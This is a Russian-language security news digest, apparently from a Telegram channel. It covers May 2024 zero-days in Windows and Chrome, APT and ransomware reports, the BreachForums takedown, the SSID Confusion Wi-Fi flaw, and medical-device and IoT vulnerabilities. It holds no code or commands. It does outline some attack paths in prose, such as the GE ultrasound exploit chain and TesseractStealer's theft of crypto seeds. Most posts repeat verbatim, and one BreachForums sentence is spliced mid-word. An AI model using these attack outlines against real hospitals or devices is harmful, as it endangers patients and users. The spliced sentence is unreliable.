Microsoft выпустила майский PatchTuesday с исправлениями 61 уязвимости, в том числе трех активно используемых или публично раскрытых нулей, а также лишь одну критическую RCE в Microsoft SharePoint Server (CVE-2024-30044, CVSS 8.8).
По категориям расклад следующий: 17 - EoP, 2 - обход функций безопасности, 27 - RCE, 7 - раскрытие информации, 3 - DoS и 4 - спуфинг. Сюда не вошли еще 12 ошибок в Microsoft Edge.
Один из двух активно эксплуатируемых нулей, CVE-2024-30051 (CVSS 7.8), связанный с повышением привилегий базовой библиотеки Windows DWM, был обнаружен исследователями из Лаборатории Касперского в апреле 2024 года в ходе исследования другой EoP-ошибки, отслеживаемой как CVE-2023-36033.
Специалисты оперативно уведомили об этом Microsoft и после этого r середине апреля заметили эксплойт для 0-day, который использовался несколькими группами киберпреступников, в том числе для инсталляции воскресшего после силовой облавы QakBot.
Технические подробности о CVE-2024-30051 обещают раскрыть чуть позже, как пользователи обновят свои системы Windows.
Второй 0-day (CVE-2024-30040, CVSS 8.8) связан с обходом функций безопасности платформы Windows MSHTML и приводит к RCE, если жертва повзаимодействует c вредоносным файлом.
Как эта уязвимость использовалась в атаках и кто ее обнаружил - не ясно.
Третий зиродей CVE-2024-30046 вызывает состояние DoS и затрагивает Visual Studio, был раскрыт публично, но также без особых подробностей.
Полный список уязвимостей, устраненных в обновлениях PatchTuesday за май 2024 года, с описанием каждой и систем, на которые она влияет, - здесь.
По категориям расклад следующий: 17 - EoP, 2 - обход функций безопасности, 27 - RCE, 7 - раскрытие информации, 3 - DoS и 4 - спуфинг. Сюда не вошли еще 12 ошибок в Microsoft Edge.
Один из двух активно эксплуатируемых нулей, CVE-2024-30051 (CVSS 7.8), связанный с повышением привилегий базовой библиотеки Windows DWM, был обнаружен исследователями из Лаборатории Касперского в апреле 2024 года в ходе исследования другой EoP-ошибки, отслеживаемой как CVE-2023-36033.
Специалисты оперативно уведомили об этом Microsoft и после этого r середине апреля заметили эксплойт для 0-day, который использовался несколькими группами киберпреступников, в том числе для инсталляции воскресшего после силовой облавы QakBot.
Технические подробности о CVE-2024-30051 обещают раскрыть чуть позже, как пользователи обновят свои системы Windows.
Второй 0-day (CVE-2024-30040, CVSS 8.8) связан с обходом функций безопасности платформы Windows MSHTML и приводит к RCE, если жертва повзаимодействует c вредоносным файлом.
Как эта уязвимость использовалась в атаках и кто ее обнаружил - не ясно.
Третий зиродей CVE-2024-30046 вызывает состояние DoS и затрагивает Visual Studio, был раскрыт публично, но также без особых подробностей.
Полный список уязвимостей, устраненных в обновлениях PatchTuesday за май 2024 года, с описанием каждой и систем, на которые она влияет, - здесь.
Securelist
QakBot attacks with Windows zero-day (CVE-2024-30051)
In April 2024, while researching CVE-2023-36033, we discovered another zero-day elevation-of-privilege vulnerability, which was assigned CVE-2024-30051 identifier and patched on May, 14 as part of Microsoft's patch Tuesday. We have seen it exploited by QakBot…
Исследователи из Лаборатории Касперского выкатили настоящий must have с квартальной аналитикой по APT-трендам, альтернативным парадигмам западного инфосека.
Причем делают это уже более шести лет, выдавая репрезентативную картину на основе собственных исследований по анализу APT-угроз.
Из основного в отчете за первый квартал 2024 года:
- Ключевые события включают использование Kimsuky бэкдора Durian на базе Golang в атаке на цепочку поставок в Южной Корее, Spyder и Remcos RAT в таргете DroppingElephant на цели в Южной Азии.
- Lazarus продолжает обновлять свои функциональные возможности и методы, избегая обнаружения.
- Выделены кампании, нацеленные на Ближний Восток, в том числе DuneQuixote, а также с участием таких APT, как Gelsemium, Careto, Oilrig.
- Отдельно рассмотрены AppleSeed (со привязкой к Andariel) и ViolentParody (потенциально приписываемую Winnti).
- в Азии и Африке орудовала SideWinder, расширяя географию и таргетинг по отраслям.
- Вредоносное ПО Spyrtacus, которое использовалось для атак на конкретных лиц в Италии, демонстрируя разработку хакерами вредоносного ПО для различных платформ, включая мобильные.
- Кампании APT по-прежнему очень географически разбросаны и ориентированы на Европу, Америку, Ближний Восток, Азию и Африку.
- Геополитика остается ключевым фактором развития APT, а кибершпионаж - главной целью кампаний.
- Продолжаются хактивистские кампании: сосредоточены в основном вокруг конфликта Израиля и Хамаса, но не только, как показывает активность SiegedSec.
Полная версия отчёта: https://securelist.com/apt-trends-report-q1-2024/112473/.
Причем делают это уже более шести лет, выдавая репрезентативную картину на основе собственных исследований по анализу APT-угроз.
Из основного в отчете за первый квартал 2024 года:
- Ключевые события включают использование Kimsuky бэкдора Durian на базе Golang в атаке на цепочку поставок в Южной Корее, Spyder и Remcos RAT в таргете DroppingElephant на цели в Южной Азии.
- Lazarus продолжает обновлять свои функциональные возможности и методы, избегая обнаружения.
- Выделены кампании, нацеленные на Ближний Восток, в том числе DuneQuixote, а также с участием таких APT, как Gelsemium, Careto, Oilrig.
- Отдельно рассмотрены AppleSeed (со привязкой к Andariel) и ViolentParody (потенциально приписываемую Winnti).
- в Азии и Африке орудовала SideWinder, расширяя географию и таргетинг по отраслям.
- Вредоносное ПО Spyrtacus, которое использовалось для атак на конкретных лиц в Италии, демонстрируя разработку хакерами вредоносного ПО для различных платформ, включая мобильные.
- Кампании APT по-прежнему очень географически разбросаны и ориентированы на Европу, Америку, Ближний Восток, Азию и Африку.
- Геополитика остается ключевым фактором развития APT, а кибершпионаж - главной целью кампаний.
- Продолжаются хактивистские кампании: сосредоточены в основном вокруг конфликта Израиля и Хамаса, но не только, как показывает активность SiegedSec.
Полная версия отчёта: https://securelist.com/apt-trends-report-q1-2024/112473/.
Securelist
Kaspersky report on APT trends in Q1 2024
The report features the most significant developments relating to APT groups in Q1 2024, including the new malware campaigns DuneQuixote and Durian, and hacktivist activity.
͏Все в точности по нами описанному сценарию произошло с BreachForums, который сегодня пестрит банером ФБР и Минюста США на главной странице с иконками двух арестованных админов ShinyHunters и Baphomet.
Но как мы и сообщали месяцем ранее, Baphomet, оставшийся в живых после ареста главного админа pompompurin, скорее всего активно сотрудничал со спецслужбами и с его помощью им удалось выйти не только на участников площадки, но и задержать ShinyHunters.
Последнего Baphomet подтянул к админке с июня 2023 года, чтобы запустить новый сайт под названием BreachForums после захвата оригинального Breached.
С того момента BreachForums быстро стал популярен в среде, особенно после таких громких утечек, какторый сегодня пестрит банером ФБР и Минюста США на главной странице с иконками двух арестованных и вишенкой стал недавний слив данных по Европолу.
По итогу правоохранительные органы конфисковали все серверы и домены сайта при содействии международных партнеров, помимо этого угнали и ТГ-канал, в котором теперь размещены формы обратной связи с ФБР для желающих раскаяться в содеянном или предоставить информацию о хакерском форуме и его участниках.
Собственно, в подтверждение наших версий, характер сообщений об изъятии указывает на то, что силовики имели доступ к серверам сайта в течение длительного времени и отслеживали деятельность злоумышленников.
Так что долгосрочная операция американских спецслужб с участием внедренных конфидентов подошла к логическому завершению, но к этому их, вероятно, подтолкнули R00TK1T и Cyber Army of Russia, которые ровно месяц назад хакнули инфраструктуру форума.
Но как мы и сообщали месяцем ранее, Baphomet, оставшийся в живых после ареста главного админа pompompurin, скорее всего активно сотрудничал со спецслужбами и с его помощью им удалось выйти не только на участников площадки, но и задержать ShinyHunters.
Последнего Baphomet подтянул к админке с июня 2023 года, чтобы запустить новый сайт под названием BreachForums после захвата оригинального Breached.
С того момента BreachForums быстро стал популярен в среде, особенно после таких громких утечек, какторый сегодня пестрит банером ФБР и Минюста США на главной странице с иконками двух арестованных и вишенкой стал недавний слив данных по Европолу.
По итогу правоохранительные органы конфисковали все серверы и домены сайта при содействии международных партнеров, помимо этого угнали и ТГ-канал, в котором теперь размещены формы обратной связи с ФБР для желающих раскаяться в содеянном или предоставить информацию о хакерском форуме и его участниках.
Собственно, в подтверждение наших версий, характер сообщений об изъятии указывает на то, что силовики имели доступ к серверам сайта в течение длительного времени и отслеживали деятельность злоумышленников.
Так что долгосрочная операция американских спецслужб с участием внедренных конфидентов подошла к логическому завершению, но к этому их, вероятно, подтолкнули R00TK1T и Cyber Army of Russia, которые ровно месяц назад хакнули инфраструктуру форума.
Google в третий раз за неделю выпускает исправления Chrome 125 для очередной 0-day в составе других восьми уязвимостей.
Наиболее серьезной из них является CVE-2024-4947, ошибка путаницы типов в движке JavaScript V8, которая уже использовалась в дикой природе.
Успешная эксплуатация уязвимости позволяет удаленному злоумышленнику выполнить произвольный код внутри песочницы через созданную HTML-страницу.
Благодарность за раскрытие уязвимости Google адресовала Василию Бердникову и Борису Ларину из Лаборатории Касперского, но не поделилась подробностями наблюдаемой эксплуатации.
Вторая ошибка, исправленная в Chrome 125, - это CVE-2024-4948, серьезная проблема использования после освобождения в Dawn, кроссплатформенной реализации с открытым исходным кодом стандарта WebGPU в Chromium.
Кроме того, устранена ошибка средней степени серьезности, связанная с использованием после освобождения, в движке V8 и проблема с несоответствующей реализацией низкой степени серьезности в разделе «загрузки».
За обе было назначено вознаграждение в размере 7000 и 1000 долларов США соответственно.
Последняя итерация Chrome теперь доступна в качестве версиий 125.0.6422.60 для Linux и 125.0.6422.60/.61 для Windows и macOS.
Пользователям рекомендуется как можно скорее обновить свои браузеры, и вообще не закрывать раздел с настройками в ожидании новых патчей.
Наиболее серьезной из них является CVE-2024-4947, ошибка путаницы типов в движке JavaScript V8, которая уже использовалась в дикой природе.
Успешная эксплуатация уязвимости позволяет удаленному злоумышленнику выполнить произвольный код внутри песочницы через созданную HTML-страницу.
Благодарность за раскрытие уязвимости Google адресовала Василию Бердникову и Борису Ларину из Лаборатории Касперского, но не поделилась подробностями наблюдаемой эксплуатации.
Вторая ошибка, исправленная в Chrome 125, - это CVE-2024-4948, серьезная проблема использования после освобождения в Dawn, кроссплатформенной реализации с открытым исходным кодом стандарта WebGPU в Chromium.
Кроме того, устранена ошибка средней степени серьезности, связанная с использованием после освобождения, в движке V8 и проблема с несоответствующей реализацией низкой степени серьезности в разделе «загрузки».
За обе было назначено вознаграждение в размере 7000 и 1000 долларов США соответственно.
Последняя итерация Chrome теперь доступна в качестве версиий 125.0.6422.60 для Linux и 125.0.6422.60/.61 для Windows и macOS.
Пользователям рекомендуется как можно скорее обновить свои браузеры, и вообще не закрывать раздел с настройками в ожидании новых патчей.
Chrome Releases
Stable Channel Update for Desktop
The Chrome team is delighted to announce the promotion of Chrome 125 to the stable channel for Windows, Mac and Linux. This will roll out o...
Лаборатория Касперского продолжает радовать отчетами, один из которых содержит аналитику по реагированию и расследованию инцидентов за 2023 год.
Учитывая при этом широку клиентскую базу по России, Европе, Азии, Южной и Северной Америке, Африке и Ближнему Востоку, база для нее более чем многообразна, то и результаты более чем репрезентативны, имея при этом четкую практическую значимость.
Согласно отчетным данным, география несколько изменилась: доля IR-запросов в России и СНГ (47,27%) продолжает расти.
В то же время 2023 год примечателен значительным увеличением количества запросов в регионе Америки (второе место с 21,82%).
Глядя на распределение инцидентов по отраслям, в 2023 году большая часть запросов поступила от госорганов (27,89%) и промышленных предприятий (17,01%).
В 2023 году ransomware оставались наиболее распространенной угрозой, несмотря на снижение их доли до 33,3% по сравнению с 39,8% в 2022 году.
Вымогатели атаковали организации без разбора, независимо от отрасли.
Наиболее распространенными семействами оставались LockBit (27,78%), BlackCat (12,96%), Phobos (9,26%) и Zeppelin (9,26%).
Еще одной важной наблюдаемой в 2023 году тенденцией стал значительный рост количества атак атаки на цепочки поставок.
Этот вектор атак вошел в тройку наиболее часто встречающихся в 2023 году, что неудивительно, поскольку позволяет злоумышленникам осуществлять крупномасштабные атаки с гораздо большей эффективностью.
Для многих организаций такие атаки могут иметь разрушительные последствия, а их обнаружение занимает гораздо больше времени.
Полный отчет с IR-статистикой, общими TTPs на разных этапах развития атаки, задействуемым хакерами инструментарием и уязвимостями доступен здесь (PDF).
Учитывая при этом широку клиентскую базу по России, Европе, Азии, Южной и Северной Америке, Африке и Ближнему Востоку, база для нее более чем многообразна, то и результаты более чем репрезентативны, имея при этом четкую практическую значимость.
Согласно отчетным данным, география несколько изменилась: доля IR-запросов в России и СНГ (47,27%) продолжает расти.
В то же время 2023 год примечателен значительным увеличением количества запросов в регионе Америки (второе место с 21,82%).
Глядя на распределение инцидентов по отраслям, в 2023 году большая часть запросов поступила от госорганов (27,89%) и промышленных предприятий (17,01%).
В 2023 году ransomware оставались наиболее распространенной угрозой, несмотря на снижение их доли до 33,3% по сравнению с 39,8% в 2022 году.
Вымогатели атаковали организации без разбора, независимо от отрасли.
Наиболее распространенными семействами оставались LockBit (27,78%), BlackCat (12,96%), Phobos (9,26%) и Zeppelin (9,26%).
Еще одной важной наблюдаемой в 2023 году тенденцией стал значительный рост количества атак атаки на цепочки поставок.
Этот вектор атак вошел в тройку наиболее часто встречающихся в 2023 году, что неудивительно, поскольку позволяет злоумышленникам осуществлять крупномасштабные атаки с гораздо большей эффективностью.
Для многих организаций такие атаки могут иметь разрушительные последствия, а их обнаружение занимает гораздо больше времени.
Полный отчет с IR-статистикой, общими TTPs на разных этапах развития атаки, задействуемым хакерами инструментарием и уязвимостями доступен здесь (PDF).
Securelist
2023 Kaspersky Incident Response report
The report shares statistics and observations from incident response practice in 2023, analyzes trends and gives cybersecurity recommendations.
Исследователи Trend Micro продолжают отслеживать кампании кибершпионажа с участием APT Earth Hundun, нацеленной на Азиатско-Тихоокеанский регион, которая теперь реализует обновленную тактику заражений и коммуникации.
Как мы ранее уже сообщали, в предыдущем отчете рассматривалась изощренная кампания Earth Hundun с Waterbear на борту и его последней версии RAT Deuterbear, который впервые был замечен еще в октябре 2022 года, став с тех пор неотъемлемой частью последующих атак.
В новом отчете подробно описываются последние версии Waterbear и Deuterbear, включая этапы заражения, взаимодействие с C2, а также работу компонентов вредоносного ПО с отражением траектории развития.
Deuterbear, хоть во многом схож с Waterbear, но демонстрирует определенные улучшения в возможностях, включая поддержку плагинов шелл-кода, отказ от рукопожатий при работе RAT и использование HTTPS для связи C2.
Сравнивая два варианта вредоносного ПО, Deuterbear использует формат шелл-кода, обладает сканированием памяти и разделяет ключ трафика со своим загрузчиком в отличие от Waterbear.
Deuterbear реализует меньше команд (20 по сравнению с более чем 60 для Waterbear), но поддерживает больше плагинов для повышения гибкости.
В целом Waterbear превратился в Deuterbear, новое вредоносное ПО, но интересно, что Waterbear и Deuterbear развиваются отдельно, а не заменяют друг друга.
Эволюция Waterbear и Deuterbear указывает на существенные сподвижки APT Earth Hundun в вопросах разработки своего арсенала инструментов, прежде всего, по части антианализа и уклонения от обнаружения.
Как мы ранее уже сообщали, в предыдущем отчете рассматривалась изощренная кампания Earth Hundun с Waterbear на борту и его последней версии RAT Deuterbear, который впервые был замечен еще в октябре 2022 года, став с тех пор неотъемлемой частью последующих атак.
В новом отчете подробно описываются последние версии Waterbear и Deuterbear, включая этапы заражения, взаимодействие с C2, а также работу компонентов вредоносного ПО с отражением траектории развития.
Deuterbear, хоть во многом схож с Waterbear, но демонстрирует определенные улучшения в возможностях, включая поддержку плагинов шелл-кода, отказ от рукопожатий при работе RAT и использование HTTPS для связи C2.
Сравнивая два варианта вредоносного ПО, Deuterbear использует формат шелл-кода, обладает сканированием памяти и разделяет ключ трафика со своим загрузчиком в отличие от Waterbear.
Deuterbear реализует меньше команд (20 по сравнению с более чем 60 для Waterbear), но поддерживает больше плагинов для повышения гибкости.
В целом Waterbear превратился в Deuterbear, новое вредоносное ПО, но интересно, что Waterbear и Deuterbear развиваются отдельно, а не заменяют друг друга.
Эволюция Waterbear и Deuterbear указывает на существенные сподвижки APT Earth Hundun в вопросах разработки своего арсенала инструментов, прежде всего, по части антианализа и уклонения от обнаружения.
Trend Micro
Tracking the Progression of Earth Hundun's Cyberespionage Campaign in 2024
This report describes how Waterbear and Deuterbear — two of the tools in Earth Hundun's arsenal — operate, based on a campaign from 2024.
Forwarded from Russian OSINT
https://www.ptsecurity.com/ru-ru/research/analytics/cybersecurity-threatscape-2024-q1/
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Social Engineering
• Выпускник Гарварда и Роберт Тэппен Моррис в 1988 году был аспирантом в Корнеллском университете, Нью-Йорк. Сын профессионального криптографа АНБ США, решил написать самораспространяющегося по ARPAnet червя.
— Сеть ARPANET (Advanced Research Projects Agency Network) была создана в 1969 году по инициативе Управления перспективных исследований Министерства Обороны США (DARPA, Defense Advanced Research Projects Agency) и явившаяся прототипом сети Интернет.
• «Червь Морриса» был первым в истории развития вычислительной техники образцом вредоносного программного обеспечения, который использовал механизмы автоматического распространения по сети. Для этого использовалось несколько уязвимостей сетевых сервисов, а так же некоторые слабые места компьютерных систем, обусловленные недостаточным вниманием к вопросам безопасности в то время.
• По словам Морриса, червь был создан в исследовательских целях. Его код не содержал в себе никакой «полезной» нагрузки. Тем не менее, из-за допущенных ошибок в алгоритмах работы, распространение червя спровоцировало так называемый «отказ в обслуживании», когда ЭВМ были заняты выполнением многочисленных копий червя и переставали реагировать на команды операторов.
• Именно неправильно реализованный алгоритм проверки, не является ли система уже зараженной, привел к массовому распространению червя в сети, вопреки задумке его автора. На практике, ПК заражались многократно, что, во-первых, приводило к быстрому исчерпанию ресурсов, во-вторых — способствовало лавинообразному распространению червя в сети. По некоторым оценкам червь Морриса инфицировал порядка 6200 компьютеров.
• «Червь Морриса» практически парализовал работу компьютеров в сети ARPANET на срок до пяти суток. Оценка простоя — минимум 8 миллионов часов и свыше 1 миллиона часов временных затрат на восстановление работоспособности систем.
• Общие убытки в денежном эквиваленте оценивались в 98 миллионов долларов, они складывались их прямых и косвенных потерь. К прямым потерям относились (32 миллиона долларов): остановка, тестирование и перезагрузка 42700 машин; идентификация червя, удаление, чистка памяти и восстановление работоспособности 6200 машин; анализ кода червя, дизассемблирование и документирование; исправление UNIX-систем и тестирование. К косвенным потерям были отнесены (66 миллионов долларов): потери машинного времени в результате отсутствия доступа к сети; потери доступа пользователей к сети.
• Сам разработчик, осознав масштабы результатов своего поступка, добровольно сдался властям и обо всем рассказал. Слушанье по его делу закончилось 22 января 1990 года. Изначально Моррису грозило до пяти лет лишения свободы и штраф в размере 25 тысяч долларов. В действительности приговор был достаточно мягок, суд назначил 400 часов общественных работ, 10 тысяч долларов штрафа, испытательный срок в три года и оплату расходов, связанных с наблюдением за осужденным.
S.E. ▪️ infosec.work ▪️ VT
Please open Telegram to view this post
VIEW IN TELEGRAM
Исследователь Марти Ванхуф обнаружил новую уязвимость, связанную с конструктивным недостатком Wi-Fi IEEE 802.11, который позволяет переподключать устройства к менее безопасной беспроводной сети и прослушивать сетевой трафик.
Атака SSID Confusion, отслеживаемая как CVE-2023-52424, затрагивает все операционные системы и клиенты Wi-Fi на протоколах WEP, WPA3, 802.11X/EAP и AMPE.
Все дело в том, что стандарт Wi-Fi не требует, чтобы имя сети (SSID или идентификатор набора служб) всегда аутентифицировалось, меры безопасности работают только лишь, когда устройство решает присоединиться к определенной сети.
Другими словами, даже несмотря на то, что пароли или другие учетные данные взаимно проверяются при подключении к защищенной сети Wi-Fi, нет никакой гарантии, что пользователь подключается именно к той сети, к которой он хочет подключиться.
Благодаря проблеме с путаницей SSID WiFi, метод позволяет создавать сети Wi-Fi с одинаковым идентификатором SSID и паролем и в случае с активированной функцией автоматического подключения устройства для организации AitM.
Успешная атака также приводит к тому, что любая VPN с функцией автоматического отключения в доверенных сетях отрубается, оставляя трафик жертвы незащищенным.
Предлагаемые исследователями меры по устранению уязвимости включают в себя обновление стандарта Wi-Fi 802.11 за счет включения SSID в четырехстороннего рукопожатия при подключении к защищенным сетям, а также улучшения в защите самих радиомаяков.
Атака SSID Confusion, отслеживаемая как CVE-2023-52424, затрагивает все операционные системы и клиенты Wi-Fi на протоколах WEP, WPA3, 802.11X/EAP и AMPE.
Все дело в том, что стандарт Wi-Fi не требует, чтобы имя сети (SSID или идентификатор набора служб) всегда аутентифицировалось, меры безопасности работают только лишь, когда устройство решает присоединиться к определенной сети.
Другими словами, даже несмотря на то, что пароли или другие учетные данные взаимно проверяются при подключении к защищенной сети Wi-Fi, нет никакой гарантии, что пользователь подключается именно к той сети, к которой он хочет подключиться.
Благодаря проблеме с путаницей SSID WiFi, метод позволяет создавать сети Wi-Fi с одинаковым идентификатором SSID и паролем и в случае с активированной функцией автоматического подключения устройства для организации AitM.
Успешная атака также приводит к тому, что любая VPN с функцией автоматического отключения в доверенных сетях отрубается, оставляя трафик жертвы незащищенным.
Предлагаемые исследователями меры по устранению уязвимости включают в себя обновление стандарта Wi-Fi 802.11 за счет включения SSID в четырехстороннего рукопожатия при подключении к защищенным сетям, а также улучшения в защите самих радиомаяков.
Top10Vpn
SSID Confusion Attack WiFi Vulnerability (CVE-2023-52424)
This vulnerability exploits a design flaw in the WiFi standard, allowing attackers to trick WiFi clients on any operating system into connecting to a untrusted network.
Румынская Bitdefender раскрыла четыре уязвимости в IoT-платформе ThroughTek Kalay, которая совместно с своей SDK используются более чем в 100 миллионах интеллектуальных устройств.
Преобладающее присутствие ThroughTek Kalay в системах видеонаблюдения и устройствах безопасности подчеркивает ее значимость для безопасности домов, предприятий и интеграторов.
Все проблемы отслеживаются как CVE-2023-6321 - CVE-2023-6324 и в случае объединения позволяют злоумышленнику повышать привилегии, получить root-доступ изнутри локальной сети, а также реализовать удаленное выполнение кода для полного взлома устройства жертвы.
ThroghTek уведомили о недостатках 19 октября 2023 года, после чего к апрелю удалось выкатить исправления и обновить все затронутые версии SDK.
В ходе изучения уязвимость исследователи сфокусировались на использующих платформу ThroughTek Kalay реализациях от Wyze Cam, Roku и Owlet Cam, подробно описан механизм эксплуатации и технические особенности уязвимостей.
Хотя в действительности, они затрагивают значительно большее число интеграторов, которым теперь также следует доставить обновленные версии встроенного ПО до конечных устройств на базе ThroughTek Kalay.
Ведь последствия выходят далеко за рамки теоретических эксплойтов, поскольку они напрямую влияют на конфиденциальность и безопасность пользователей.
Преобладающее присутствие ThroughTek Kalay в системах видеонаблюдения и устройствах безопасности подчеркивает ее значимость для безопасности домов, предприятий и интеграторов.
Все проблемы отслеживаются как CVE-2023-6321 - CVE-2023-6324 и в случае объединения позволяют злоумышленнику повышать привилегии, получить root-доступ изнутри локальной сети, а также реализовать удаленное выполнение кода для полного взлома устройства жертвы.
ThroghTek уведомили о недостатках 19 октября 2023 года, после чего к апрелю удалось выкатить исправления и обновить все затронутые версии SDK.
В ходе изучения уязвимость исследователи сфокусировались на использующих платформу ThroughTek Kalay реализациях от Wyze Cam, Roku и Owlet Cam, подробно описан механизм эксплуатации и технические особенности уязвимостей.
Хотя в действительности, они затрагивают значительно большее число интеграторов, которым теперь также следует доставить обновленные версии встроенного ПО до конечных устройств на базе ThroughTek Kalay.
Ведь последствия выходят далеко за рамки теоретических эксплойтов, поскольку они напрямую влияют на конфиденциальность и безопасность пользователей.
Bitdefender Labs
Notes on ThroughTek Kalay Vulnerabilities and Their Impact on the IoT Ecosystem
Since 2014, Bitdefender IoT researchers have been looking into the world's most popular IoT devices, hunting for vulnerabilities and undocumented attack avenues.
Исследователи Nozomi Networks обнаружули набор из 11 уязвимостей, затрагивающих линейку УЗИ-аппаратов GE HealthCare Vivid Ultrasound, которые могут быть использованы для подделки данных пациентов и даже внедрения ransomware.
Проблемы ультразвуковую систему Vivid T9 и ее предустановленное приложение Common Service Desktop, которое отображается в локальном интерфейсе устройства и позволяет пользователям выполнять административные действия.
Также ошибкам подвержена другая ПО под названием EchoPAC, установленную на рабочей станции врача под управлением Windows и реализующая доступ к многомерным эхо-изображениям, изображениям УЗИ сосудов и брюшной полости.
При этом для успешной эксплуатации злоумышленнику необходимо прежде получить доступ к больничной среде и обеспечить возможность физического взаимодействия с устройством.
Самая серьезная из уязвимостей, CVE-2024-27107 (оценка CVSS: 9,6) связана с использованием жестко закодированных учетных данных.
Другие выявленные недостатки относятся к внедрению команд (CVE-2024-1628), выполнению с излишними привилегиями (CVE-2024-27110 и CVE-2020-6977), обходу пути (CVE-2024-1630 и CVE-2024-1629) и сбою механизма защиты (CVE-2020-6977).
Разработанная Nozomi Networks цепочка эксплойтов задействует CVE-2020-6977 для получения локального доступа к устройству, а затем CVE-2024-1628 - для RCE.
Однако, чтобы ускорить процесс, злоумышленник может также воспользоваться USB-портом для подключения вредоносной флэшки, которая, эмулируя клавиатуру и мышь, автоматически выполнит все необходимые действия в автомате.
В качестве альтернативы злоумышленник может получить доступ к внутренней сети больницы, используя угнанный VPN, сосканить уязвимые EchoPAC, а затем обратиться к CVE-2024-27107 для получения беспрепятственного доступа к базе данных пациентов.
В самом нереалистичным сценарии злоумышленник с физическим доступом может просто окирпичить устройство.
Владельцы устройств могут найти все официальные обновления и меры по устранению уязвимостей для затронутых конфигураций на портале безопасности GE HealthCare.
Проблемы ультразвуковую систему Vivid T9 и ее предустановленное приложение Common Service Desktop, которое отображается в локальном интерфейсе устройства и позволяет пользователям выполнять административные действия.
Также ошибкам подвержена другая ПО под названием EchoPAC, установленную на рабочей станции врача под управлением Windows и реализующая доступ к многомерным эхо-изображениям, изображениям УЗИ сосудов и брюшной полости.
При этом для успешной эксплуатации злоумышленнику необходимо прежде получить доступ к больничной среде и обеспечить возможность физического взаимодействия с устройством.
Самая серьезная из уязвимостей, CVE-2024-27107 (оценка CVSS: 9,6) связана с использованием жестко закодированных учетных данных.
Другие выявленные недостатки относятся к внедрению команд (CVE-2024-1628), выполнению с излишними привилегиями (CVE-2024-27110 и CVE-2020-6977), обходу пути (CVE-2024-1630 и CVE-2024-1629) и сбою механизма защиты (CVE-2020-6977).
Разработанная Nozomi Networks цепочка эксплойтов задействует CVE-2020-6977 для получения локального доступа к устройству, а затем CVE-2024-1628 - для RCE.
Однако, чтобы ускорить процесс, злоумышленник может также воспользоваться USB-портом для подключения вредоносной флэшки, которая, эмулируя клавиатуру и мышь, автоматически выполнит все необходимые действия в автомате.
В качестве альтернативы злоумышленник может получить доступ к внутренней сети больницы, используя угнанный VPN, сосканить уязвимые EchoPAC, а затем обратиться к CVE-2024-27107 для получения беспрепятственного доступа к базе данных пациентов.
В самом нереалистичным сценарии злоумышленник с физическим доступом может просто окирпичить устройство.
Владельцы устройств могут найти все официальные обновления и меры по устранению уязвимостей для затронутых конфигураций на портале безопасности GE HealthCare.
Nozominetworks
Vulnerabilities on GE HealthCare Vivid Ultrasound Could Allow Malicious Insiders to Locally Install Ransomware, Access and Manipulate…
Nozomi Networks Labs identified 11 vulnerabilities that could affect hospital workflows or the security of medical data being processed.
Южнокорейская AhnLab в своем отчете расчехлила новые версии RAT ViperSoftX c механизмом OCR с открытым исходным кодом Tesseract извлечения текста из изображений на зараженном хосте, используя методы глубокого обучения.
Злоумышленники традиционно задействуют ViperSoftX, впервые обнаруженный Fortinet в 2020 году и циркулирующий уже несколько лет, для внедрения различных штаммов вредоносного ПО, яркими примерами которого являются Quasar RAT и TesseractStealer.
В 2022 году Avast сообщала об активности ViperSoftX, когда вместо JavaScript применялся сценарии PowerShell, расширяя возможности с добавлением таких функций, как изменение буфера обмена, установку дополнительных полезных нагрузок и кражу адресов криптокошельков.
Кроме того, вредоносное ПО использовало VenomSoftX для установки вредоносных расширений в веб-браузеры на базе Chrome с целью кражи информации.
В отчете TrendMicro за 2023 год рассматривались новые методы распространения ViperSoftX и акцентировано внимание на реализацию проверок на наличие установленных менеджеров паролей по сравнению с предыдущими версиями.
Недавно замеченный ViperSoftX аналогичен тому, который был раскрыт Fortinet, однако имеет различия: шифрование User-Agent с помощью алгоритма Base64 и использование ключевого слова Welcome_2025 вместо viperSoftx.
Что касается дополнительных вредоносных ПО, исследователи отмечают, что с марта 2024 года на большом количестве систем стабильно наблюдаются многочисленные случаи установки Quasar RAT с нацеливанием на широкий круг жертв одновременно.
Причем большинство замеченных в атаках Quasar RAT не имеют существенных отличительных особенностей, но в последнее время выявлены случаи использования Tor для взаимодействия с Onion-доменом С2.
Помимо Quasar RAT в наблюдавшейся атаке было замечено вредоносное ПО TesseractStealer, которое считывает изображения в зараженных системах и с помощью Tesseract извлекает текст, который выглядит как адреса криптовалют, начальные фразы или пароли, отправляя из на С2.
TesseractStealer сначала создает файлы библиотек Tesseract (tesseract50.dll) и Leptonica (leptonica-1.82.0.dll), а также файл обучающих данных (eng.traineddata) вместе с файлом шрифта (pdf.ttf).
Затем находит в системе файлы расширениями «.png», «.jpg» и «.jpeg», за исключением тех, которые расположены в каталоге редактора. Затем с использованием установленной библиотеки Tesseract извлекает строки из каждого изображения.
Проверка выявляет наличие связей с OTP, паролями, необходимыми для восстановления, адресами криптокошельков и другими подобными данными, явно нацеливая на цифровые активы жертв. После чего нужные изображения отправляются на С2.
Полный набор IoC, включая и список поисковых фраз - в отчете AhnLab.
Злоумышленники традиционно задействуют ViperSoftX, впервые обнаруженный Fortinet в 2020 году и циркулирующий уже несколько лет, для внедрения различных штаммов вредоносного ПО, яркими примерами которого являются Quasar RAT и TesseractStealer.
В 2022 году Avast сообщала об активности ViperSoftX, когда вместо JavaScript применялся сценарии PowerShell, расширяя возможности с добавлением таких функций, как изменение буфера обмена, установку дополнительных полезных нагрузок и кражу адресов криптокошельков.
Кроме того, вредоносное ПО использовало VenomSoftX для установки вредоносных расширений в веб-браузеры на базе Chrome с целью кражи информации.
В отчете TrendMicro за 2023 год рассматривались новые методы распространения ViperSoftX и акцентировано внимание на реализацию проверок на наличие установленных менеджеров паролей по сравнению с предыдущими версиями.
Недавно замеченный ViperSoftX аналогичен тому, который был раскрыт Fortinet, однако имеет различия: шифрование User-Agent с помощью алгоритма Base64 и использование ключевого слова Welcome_2025 вместо viperSoftx.
Что касается дополнительных вредоносных ПО, исследователи отмечают, что с марта 2024 года на большом количестве систем стабильно наблюдаются многочисленные случаи установки Quasar RAT с нацеливанием на широкий круг жертв одновременно.
Причем большинство замеченных в атаках Quasar RAT не имеют существенных отличительных особенностей, но в последнее время выявлены случаи использования Tor для взаимодействия с Onion-доменом С2.
